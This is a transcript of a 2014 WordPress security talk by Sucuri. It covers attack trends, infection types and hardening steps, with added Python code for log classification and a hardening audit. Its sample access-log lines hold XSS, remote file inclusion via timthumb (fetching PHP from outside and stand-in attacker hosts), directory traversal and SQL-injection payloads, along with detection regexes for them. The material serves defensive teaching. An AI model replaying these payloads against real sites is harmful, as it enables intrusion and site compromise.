WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security


Published on April 26, 2014

Author: perezbox

Source: slideshare.net

Website Security (WordPress)

Tony Perez | @perezbox | @sucuri_security | 4/26/2014

About the speaker:
- Organization: Sucuri, Inc. (@sucuri_security, @perezbox)
- Specialization: Website Security, Incident Handling
- Special Interests: Brazilian Jiu-Jitsu

About Sucuri:
- Website security company
- Global operations, 24/7
- Platform agnostic (i.e., WordPress, Joomla, etc.)
- Scan 3M unique domains a month
- Perform 50M+ scans a month
- Block 30M+ website attacks a month
- Remediate 400-500 websites a day
- 30k+ clients / 250k+ unique domains

Agenda: Trends, Threats, Defenses. Simple, right?

Chart: Data Breaches (Millions), 2011 vs. 2013

Chart: Malicious Websites vs. Legitimate Websites

Chart: Exploitable vs. Not-Exploitable. 1 in 8: critical vulnerability.

Chart: Website infection types
- 26% Remote iFrame Includes
- 19% Remote JavaScript Includes
- 16% SPAM Injections
- 14% Obfuscated / Encoded JavaScript
- 11% Conditional Redirects
- 4% Defacements
- 10% Other

Server-level threats: going deeper than the application layer, targeting the server.
- Darkleech
- Cdork (Apache)
- Ebury (SSH)
- Email Server (SPAM)
- Heartbleed (OpenSSL)
- Server polymorphism, a.k.a. highly adaptive / sophisticated malware

Spam injection themes: Pharmacy, Payday Loans

Exploiting Access Control

Cross-Site Contamination (diagram: Site 1, Site 2, Site 3, Site 4)

Malware Payloads:
- Explosion in the Malware as a Service (MaaS) trade
- Yes, pay someone to hack for you
- Different tools to break in and generate payloads
- Brute force and vulnerability exploits
- Blackhole exploit kit author arrested

Chart: Exploit kit distribution: Neutrino, Unknown Kit, Redkit, SweetOrange, Styx, Glazunov/Sibhost, Nuclear, Blackhole/Cool, Other (percentages shown on the slide: 25%, 22%, 9%, 1%, 11%, 5%, 12%, 10%, 5%, 0%)

What kind of website do you have?
- Use for malware?
- Burrow into network?
- Steal data?

Cross-Site Scripting (XSS), stored and reflective. Sample log entries:

38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268

Remote and local file inclusion. Sample log entries (timthumb.php / thumb.php remote includes, and a directory-traversal request for /proc/self/environ):

[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

SQL injection. Sample log entry:

62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
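As an added example that is not part of the presentation, the following Python classifier parses lines in the combined log format shown on these slides, percent-decodes each request target and tags it as XSS, remote file inclusion, local file inclusion / traversal or SQL injection. The log lines, IP addresses and host names in SAMPLE_LOG are constructed placeholders modelled on the slide examples, and the signature list is a deliberately small assumption rather than a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the slide examples; IPs and hosts are documentation placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.0.113.11 - - [02/Apr/2013:00:32:58 -0400] "GET /wp-content/themes/example/timthumb.php?src=http%3A%2F%2Fattacker.example%2Fshell.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0"
203.0.113.12 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0"
203.0.113.13 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0"
203.0.113.14 - - [03/Apr/2013:05:25:00 -0400] "GET /wp-content/uploads/2013/04/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target protocol" status bytes ...
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}|-)')

# One small pattern family per attack class from the slides, applied to the decoded request target.
SIGNATURES = {
    "xss": re.compile(r"<\s*script|on(?:error|load|click)\s*=|javascript:", re.I),
    "rfi": re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.I),          # parameter pointing at a remote URL (timthumb-style)
    "lfi": re.compile(r"\.\./|/proc/self/environ|\x00", re.I),         # traversal, environ read, null-byte truncation
    "sqli": re.compile(r"union\s+select|\bor\s+1\s*=\s*1|sleep\(\d+\)", re.I),
}

def decode_target(target):
    """Percent-decode twice so that single- and double-encoded payloads both surface."""
    for _ in range(2):
        target = unquote_plus(target)
    return target

def classify_request(target):
    """Return the attack classes whose signature matches the decoded request target."""
    decoded = decode_target(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Parse each log line and keep only the requests that match at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "status": m["status"], "target": m["target"], "tags": tags})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]:15} {hit["status"]:>3} {",".join(hit["tags"]):5} {hit["target"]}')
```

Note that the status code is kept alongside the tags: a 200 on a timthumb or union-select request (as in the slide examples) is the line worth investigating first, while a 404 on the same payload usually means the target did not exist.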

Unmasking "free premium" WordPress plugins (http://blog.sucuri.net/2014/03/unmasking-free-premium-wordpress-plugins.html):
- SEOPressor: payload located in wp-content/plugins/seo-pressor(gratuit), file central.class.php
- Restrict Content Pro: payload located in wp-content/restrict-content-pro/includes/, file sidebar.php
- Flat Skins Pack Extension: payload located in wp-content/ubermenu-skins-flat

Impact of a compromise:
- Brand reputation
- Legal implications
- Impact to sales
- Blacklisted by search engines
- Blacklisted by payment processors
- Worst day of your life

Sucuri properties suffer:
- ~125,000 web-based attacks a month on average
- ~4,000 attacks a day (this spikes on occasion)
- Doesn't include server-level attacks
- All flavors of attacks

Defenses: Principles, Access Control, Vulnerabilities

"It's about risk reduction... risk will never be zero..."

Defense in depth: "...a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited..."

Passwords: Complex, Long, Unique

Least privilege: "requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose."

PHP execution, disable it in:
- /wp-includes
- /wp-content
- /themes
- /plugins
- /uploads

.htaccess:

<Files *.php>
Deny from all
</Files>

wp-config.php modification:

# Disable Plugin / Theme Editor
define('DISALLOW_FILE_EDIT', true);

NOT THAT HARD!!!!

The Bare Minimum:
1. Connect securely (SFTP / SSH)
2. Authentication keys / wp-config
3. Use trusted sources
4. Use a local antivirus (Mac too)
5. Permissions: directories 755, files 644
6. Least privilege principles
7. Accountability
8. Backups, including the database

Ideal implementations:
1. Employ a website firewall
2. Don't let WordPress write to itself
3. Filter access by IP / multi-factor authentication
4. Use a dedicated server / VPS
5. Monitor all activity (logging)
6. Enable SSL for transactions
7. Keep environment current (patched)
8. No soup kitchen servers
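As an added example that is not part of the presentation, the following Python audit checks three of the items above against a WordPress root: the DISALLOW_FILE_EDIT setting in wp-config.php, the per-directory .htaccess that denies PHP execution, and the 755/644 permission scheme. The sample site tree it builds is constructed in a temporary directory, and NO_PHP_DIRS is an assumed subset of the directories the slides name.

```python
import os, re, stat, tempfile

DIR_MODE, FILE_MODE = 0o755, 0o644                    # "Permissions - D 755 | F 644"
NO_PHP_DIRS = ("wp-includes", "wp-content/uploads")   # assumed subset of the dirs the slides deny PHP in
EDIT_RE = re.compile(r"""define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.I)
# Accepts the Apache 2.2 "Deny from all" form shown on the slide and its Apache 2.4 equivalent.
HTACCESS_RE = re.compile(r"<Files\s+\*\.php>.*?(Deny\s+from\s+all|Require\s+all\s+denied).*?</Files>", re.I | re.S)

def file_matches(path, rx):
    """True when the file exists and its contents match the pattern."""
    if not os.path.isfile(path):
        return False
    with open(path, encoding="utf-8") as fh:
        return rx.search(fh.read()) is not None

def audit(root):
    """Return a sorted list of hardening gaps found under a WordPress root (the root dir itself is not checked)."""
    findings = []
    if not file_matches(os.path.join(root, "wp-config.php"), EDIT_RE):
        findings.append("wp-config.php: DISALLOW_FILE_EDIT is not set to true")
    for d in NO_PHP_DIRS:
        if not file_matches(os.path.join(root, d, ".htaccess"), HTACCESS_RE):
            findings.append(f"{d}/.htaccess: no '<Files *.php> Deny from all' block")
    for dirpath, dirnames, filenames in os.walk(root):
        for name, want in [(n, DIR_MODE) for n in dirnames] + [(n, FILE_MODE) for n in filenames]:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            if mode != want:
                findings.append(f"{os.path.relpath(full, root)}: mode {mode:o}, expected {want:o}")
    return sorted(findings)

def build_sample_site(hardened):
    """Build a constructed, minimal WordPress-like tree in a temp dir and return its path."""
    root = tempfile.mkdtemp()
    for d in NO_PHP_DIRS:
        os.makedirs(os.path.join(root, d))
    files = {"wp-config.php": "<?php\n" + ("define('DISALLOW_FILE_EDIT', true);\n" if hardened else "")}
    for d in (NO_PHP_DIRS if hardened else ()):
        files[d + "/.htaccess"] = "<Files *.php>\nDeny from all\n</Files>\n"
    for rel, text in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(text)
    for dirpath, dirnames, filenames in os.walk(root):   # normalise everything to 755 / 644 first
        for n, m in [(n, DIR_MODE) for n in dirnames] + [(n, FILE_MODE) for n in filenames]:
            os.chmod(os.path.join(dirpath, n), m)
    if not hardened:   # the weak site: world-writable uploads directory and config file
        os.chmod(os.path.join(root, "wp-content/uploads"), 0o777)
        os.chmod(os.path.join(root, "wp-config.php"), 0o666)
    return root
```

`audit(build_sample_site(False))` lists five gaps for the weak tree and nothing for the hardened one; on a real install point `audit()` at the document root (e.g. a placeholder such as /var/www/html).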

1. Fix index.php file and assume all is fine.
2. Panic your way into WordPress forums after hack.
3. Don't worry about updating.
4. Trust third-party extensions.
5. Apply all upgrades on live site.
6. Install and forget, all is well with your new site.
7. Use the same username and password for everything.
8. Don't waste time making security adjustments to PHP and settings.
9. No regular backups required.
10. Use the cheapest host.

Resources:
- Sucuri Blog: http://blog.sucuri.net
- SucuriTV: http://sucuri.tv
- Malware Scanner: http://sitecheck.sucuri.net
- Malware Scanner: http://unmaskparasites.com
- Badware Busters: https://badwarebusters.org
- Google Forums: http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
- Google Webmaster Tools: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
- Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
- Exploit-DB: http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
- WordPress Hacked FAQ: http://codex.wordpress.org/FAQ_My_site_was_hacked
- WordPress Hardening: http://codex.wordpress.org/Hardening_WordPress

Sucuri, Inc. | Tony Perez | http://sucuri.net | http://blog.sucuri.net | @perezbox | @sucuri_security
